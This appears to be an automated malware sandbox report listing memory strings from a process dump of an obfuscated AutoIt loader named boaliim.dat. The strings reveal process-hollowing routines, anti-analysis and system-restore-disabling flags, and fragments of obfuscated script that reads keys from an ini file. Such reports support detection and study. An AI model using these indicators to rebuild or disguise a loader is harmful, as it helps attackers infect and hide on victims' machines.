Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: emulator_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _stringbetweenb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_contexte
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_startuph
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antitasks
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablersv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9e5ej
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shimlt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 520c39e26/304/6/3052_4f02_d30_2_d70c2_e///05/75f2d/50920fd43039//e6266e20444f53206d6f64652e0d0d0*24
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0\shjgtph.kmt4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: criticalsectiontimeout;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansionbitmap<
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fastpebunlockroutine%
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberofrvaandsizes.
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kernelcallbacktableut
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansioncounter
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentreservee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentreserve
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentcommittat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: extendedregistersps
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: maximumnumberofheaps
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofheapreserve
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processstarterhelper
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: postprocessinitroutine
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcharacteristics
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: writeprocessmemoryut
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofstackcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofheapcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagebaseaddresse
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: environmentupdatecount
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: criticalsectiontimeout
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofstackreserver
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gdisharedhandletablez
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansionbitmapbitsc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gdidcattributelistd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inheritedaddressspacem
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processparametersnetv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fastpeblockroutinee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ansicodepagedatacount`
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unicodecasetabledatai
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: extendedregisters
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ansicodepagedataons
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unicodecasetabledataon
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inheritedaddressspace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_contextset41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majorlinkerversion5-21-7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minorlinkerversionmver8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\syswow64!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ef20f3a169*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablesysrestoreatae
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofoptionalheader
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountinc41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720edab4441
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountdec41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: addressofnewexeheader
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_fixreloc41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertorawdatans
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertorelocationsa
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertolinenumbersta
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberofrelocationsa
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da1ec28a691
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_dllhandlesetn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagebaseaddress25541
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberofsections
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansioncounter41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberoflinenumbersv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_decryptdataeph_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertosymboltable@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fastpeblockroutinephi
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountssr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: addressofentrypoint{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sectionalignment\|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minorsubsystemversione
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majorsubsystemversionn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofuninitializeddata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: win32versionvalue
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minorimageversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majorimageversionm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201\^
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ca0024d60201\comctl32.dllt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: en-us
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c703e6af597b4bin.sdb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minoroperatingsystemversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd3ae6ba444d620c1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fe2ff4bb477760319f8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da0ceea6516a6b0c
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptions
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9eb23f2a4516c7d279f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da03e6af597b4b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9f82ff5a1517a7e309f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majoroperatingsystemversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da1ce2a45f7b4034b1a0w
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qrsbbkj-7wo8i291jb09ygiu694l^
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c82fecad5d6b750ce
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemorybase3f2a0
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ed0fcb8f6f5556609f{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\ntmarta.dllb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_allocateexespace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fexpfc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemmajorversion4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthreshold#
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionold*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemmajorversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cwvoayzpefzjbexpebfcjexe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommittotalfreethreshold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthreshold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemoryheap
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlystaticserverdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemorybase
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthresholds
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommittotalfreethresholda
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlystaticserverdatah
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptionsw
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionold~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptionsnold7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oboaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ryoboaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dz\temp\
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gvqj.txt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\p
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runper
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: checkint
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: denarioy
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mainpe~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: chrome
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cbsize
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: thread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ysize`@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xsize
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: title`?
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: flags
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: desktop
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eggsh[
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tagwordb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tagwordm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dr2ord
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sscs d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segfst=
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segds"
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: seges$
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: overlay
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: seggs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pagesx]
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pages
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magic(_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magich_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eflags
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mutant
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spareh
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segcse
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segssj
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tagwordg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segfs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: machinei
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magic8t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: utant
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ordro
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magic
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spare2
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: closehandle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: andle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: closehandle0d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segds
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segcs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: seges
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eflagsc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nameh
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spare
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: andleb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sumethread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dwordx
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: resumethread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pare2$
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ygiu694lr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002k
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdressd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9de0fe3ac427d6126889cf80esq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ed01c99c7540460a80acc31b7c~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb255777417aa96ec3c7ck
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdress
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9de0fe3ac427d61268995eb0e7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word magic;byte majorlinkerversion;<
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdress)
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdressmp"
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\knmo\boaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9de06c289745d400699b7ca007cz
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dword virtualaddress; dword sizeofblockg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0el
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cc0ceea6516a6b1cab98e8327cy
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9dd2de8a55d797c31aa90e1327cf
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b82
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da3df3a9426c6725af97e9387c?
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9fd2bf3bc5976752680b7d6, $_y0x3856f9c720ee97637d6621af97e8247c, "mtext", '')
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9fe2ff4bb477760319f = iniread($_y0x3856f9fd2bf3bc5976752680b7d6, $_y0x3856f9c720ee97637d6621af97e8247c, "k3ysx", '')
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = fileread(filegetshortname(@scriptdir & "\" & $_y0x3856f9eb36e28b456c771ba794ea0e))\|$
